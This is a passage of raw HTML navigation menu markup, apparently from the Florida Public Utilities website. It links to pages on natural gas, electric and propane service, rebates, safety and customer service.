ubermenu-item-8272 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/training/"><span class="ubermenu-target-title ubermenu-target-text">Gas Safety Training</span></a></li><li id="menu-item-8269" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-8269 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.ask4gas.com/safetysurvey/"><span class="ubermenu-target-title ubermenu-target-text">Gas Safety Survey</span></a></li><li id="menu-item-5223" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5223 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/energy-saving-tools/"><span class="ubermenu-target-title ubermenu-target-text">Energy-Saving Tools</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5223 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5276" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5276 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/energy-saving-tools/free-energy-checkup/"><span class="ubermenu-target-title ubermenu-target-text">FREE Energy Check-Ups</span></a></li><li id="menu-item-5279" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5279 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/energy-saving-tools/quick-tips-to-save-energy/"><span class="ubermenu-target-title ubermenu-target-text">Quick Tips to Save Energy</span></a></li><li id="menu-item-5281" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5281 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/energyexpert/"><span class="ubermenu-target-title ubermenu-target-text">Energy Experts</span></a></li></ul></li></ul></li><li id="menu-item-5219" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5219 ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-5 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/rebates-conservation/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Rebates</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5219 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5195" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5195 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/rebates-conservation/rebates/"><span class="ubermenu-target-title ubermenu-target-text">Residential Rebates</span></a></li><li id="menu-item-5221" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5221 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/rebates-conservation/how-to-redeem-rebates/"><span class="ubermenu-target-title ubermenu-target-text">Redeeming Your Rebate</span></a></li><li id="menu-item-5215" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5215 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/naturalgas/rebates-conservation/commercial-rebates/"><span class="ubermenu-target-title ubermenu-target-text">Commercial Rebates</span></a></li><li id="menu-item-5998" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5998 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/transportation-services/"><span class="ubermenu-target-title ubermenu-target-text">Provider Choice Program</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5998 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5999" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5999 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/transportation-services/providers/"><span class="ubermenu-target-title ubermenu-target-text">Info For Providers</span></a></li><li id="menu-item-6001" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-6001 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/transportation-services/customers/"><span class="ubermenu-target-title ubermenu-target-text">Info For Customers</span></a></li></ul></li></ul></li><li id="menu-item-5256" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5256 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-5 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" title="NG" href="https://fpuc.com/naturalgas/customer-service/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Customer Service</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5256 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5284" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5284 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/customer-service/contact-information/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Contact Information</span></a></li><li id="menu-item-5287" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5287 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" target="_blank" href="/customer-service/areas-we-serve/#new_tab"><span class="ubermenu-target-title ubermenu-target-text">Service Area Map</span></a></li><li id="menu-item-5291" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5291 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/customer-service/establishing-service/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Service</span></a></li><li id="menu-item-5297" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5297 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/customer-service/understanding-your-bill/"><span class="ubermenu-target-title ubermenu-target-text">Understanding Your Bill</span></a></li><li id="menu-item-5300" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5300 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/customer-service/customer-welcome-book/"><span class="ubermenu-target-title ubermenu-target-text">Customer Welcome Book</span></a></li><li id="menu-item-5303" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5303 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/customer-service/forms-feedback/"><span class="ubermenu-target-title ubermenu-target-text">Florida Public Utilities Forms</span></a></li><li id="menu-item-5307" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5307 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/payments/authorized-users/"><span class="ubermenu-target-title ubermenu-target-text">Authorized Users</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li><li id="menu-item-5188" class="elec ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5188 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Electric</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5188 ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-center ubermenu-autoclear" ><li id="menu-item-5200" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5200 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/residential/"><span class="ubermenu-target-title ubermenu-target-text">Residential Electric Service</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5200 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5329" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5329 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/residential/participating-contractors/"><span class="ubermenu-target-title ubermenu-target-text">Participating Contractors</span></a></li><li id="menu-item-5227" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5227 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/faq/"><span class="ubermenu-target-title ubermenu-target-text">Electric FAQs</span></a></li><li id="menu-item-5205" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5205 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/commercial/"><span class="ubermenu-target-title ubermenu-target-text">For Business</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5205 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5330" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5330 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/commercial/participating-contractors/"><span class="ubermenu-target-title ubermenu-target-text">Participating Contractors</span></a></li></ul></li><li id="menu-item-5209" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5209 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/builders/"><span class="ubermenu-target-title ubermenu-target-text">For Builders</span></a></li><li id="menu-item-5264" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5264 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" title="Residential" href="https://fpuc.com/electric/rates-tariffs/"><span class="ubermenu-target-title ubermenu-target-text">Rates &#038; Tariffs</span></a></li></ul></li><li id="menu-item-5216" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5216 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/conservation-rebates/"><span class="ubermenu-target-title ubermenu-target-text">Electric Rebates</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5216 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5194" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5194 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/residential/rebates/"><span class="ubermenu-target-title ubermenu-target-text">Residential Electric Rebates</span></a></li><li id="menu-item-5217" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5217 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/commercial/commercial-rebates/"><span class="ubermenu-target-title ubermenu-target-text">Commercial Rebates</span></a></li><li id="menu-item-5220" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5220 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/residential/how-to-redeem-rebates/"><span class="ubermenu-target-title ubermenu-target-text">How to Redeem &#038; Track Rebates</span></a></li><li id="menu-item-5222" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5222 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/energysaving/"><span class="ubermenu-target-title ubermenu-target-text">Energy Saving Tools</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5222 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5277" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5277 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/energysaving/free-energy-check-up/"><span class="ubermenu-target-title ubermenu-target-text">Free Energy Check-Up</span></a></li><li id="menu-item-5280" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5280 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/energysaving/quicktips/"><span class="ubermenu-target-title ubermenu-target-text">Quick Tips to Save Energy</span></a></li></ul></li></ul></li><li id="menu-item-5234" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5234 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/safety/"><span class="ubermenu-target-title ubermenu-target-text">Safety</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5234 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5233" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5233 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/safety/general-safety-tips/"><span class="ubermenu-target-title ubermenu-target-text">General Safety Tips</span></a></li><li id="menu-item-5197" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5197 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/safety/storm-information/"><span class="ubermenu-target-title ubermenu-target-text">Storm Information</span></a></li><li id="menu-item-5240" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5240 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/safety/dial811/"><span class="ubermenu-target-title ubermenu-target-text">811 Before You Dig</span></a></li><li id="menu-item-5335" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5335 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/safety/power-outages/"><span class="ubermenu-target-title ubermenu-target-text">Power Outages</span></a></li><li id="menu-item-8273" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-8273 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/safety/training/"><span class="ubermenu-target-title ubermenu-target-text">Electric Safety Training</span></a></li><li id="menu-item-5249" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5249 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/programs-services/"><span class="ubermenu-target-title ubermenu-target-text">Services &#038; Programs</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5249 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5340" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5340 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/programs-services/tou/"><span class="ubermenu-target-title ubermenu-target-text">TIME-OF-USE (T.O.U.)</span></a></li><li id="menu-item-5341" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5341 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/payments/budgetbilling/"><span class="ubermenu-target-title ubermenu-target-text">Budget Billing</span></a></li><li id="menu-item-5342" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5342 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/payments/assistance-programs/"><span class="ubermenu-target-title ubermenu-target-text">Assistance Programs</span></a></li></ul></li><li id="menu-item-5334" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5334 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/fpu-emergency-response/"><span class="ubermenu-target-title ubermenu-target-text">Emergency Response</span></a></li></ul></li><li id="menu-item-5293" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5293 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/customer-service/"><span class="ubermenu-target-title ubermenu-target-text">Electric Customer Service</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5293 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5282" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5282 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/customer-service/contact-information/"><span class="ubermenu-target-title ubermenu-target-text">Contact Electric Customer Service</span></a></li><li id="menu-item-5286" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5286 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" target="_blank" href="/customer-service/areas-we-serve/#new_tab"><span class="ubermenu-target-title ubermenu-target-text">Service Area Map</span></a></li><li id="menu-item-5290" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5290 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/customer-service/establishing-service/"><span class="ubermenu-target-title ubermenu-target-text">Service Requests / Inquiries</span></a></li><li id="menu-item-5295" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5295 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/customer-service/understanding-your-bill/"><span class="ubermenu-target-title ubermenu-target-text">Understanding Your Bill</span></a></li><li id="menu-item-5299" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5299 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/customer-service/customer-welcome-book/"><span class="ubermenu-target-title ubermenu-target-text">Customer Welcome Book</span></a></li><li id="menu-item-5302" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5302 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/electric/customer-service/customer-forms-feedback/"><span class="ubermenu-target-title ubermenu-target-text">Customer Forms</span></a></li><li id="menu-item-5306" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5306 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" target="_blank" href="/payments/authorized-users/#new_tab"><span class="ubermenu-target-title ubermenu-target-text">Authorized Users</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li><li id="menu-item-5189" class="propane ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5189 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Propane</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5189 ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-center ubermenu-autoclear" ><li id="menu-item-6388" class="formLink ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6388 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-clear-row ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/propane-new-service-inquiry"><span class="ubermenu-target-title ubermenu-target-text">Interested in Propane?</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-6388 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5199" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5199 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/residential/"><span class="ubermenu-target-title ubermenu-target-text">For Home</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5199 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5345" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5345 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/residential/appliances/"><span class="ubermenu-target-title ubermenu-target-text">Appliances</span></a></li><li id="menu-item-5226" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5226 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/faq/"><span class="ubermenu-target-title ubermenu-target-text">Frequently Asked Questions</span></a></li><li id="menu-item-5265" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5265 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/residential/appliance-services-and-repairs/"><span class="ubermenu-target-title ubermenu-target-text">Appliance Services and Repairs</span></a></li></ul></li><li id="menu-item-5204" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5204 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/commercial/"><span class="ubermenu-target-title ubermenu-target-text">For Business</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5204 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5344" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5344 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/commercial/appliances/"><span class="ubermenu-target-title ubermenu-target-text">Appliances</span></a></li></ul></li></ul></li><li id="menu-item-5953" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5953 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/builders/"><span class="ubermenu-target-title ubermenu-target-text">For Builders</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5953 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5956" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5956 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/safety/"><span class="ubermenu-target-title ubermenu-target-text">Safety</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5956 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5954" class="ubermenu-item ubermenu-item-type-post_type 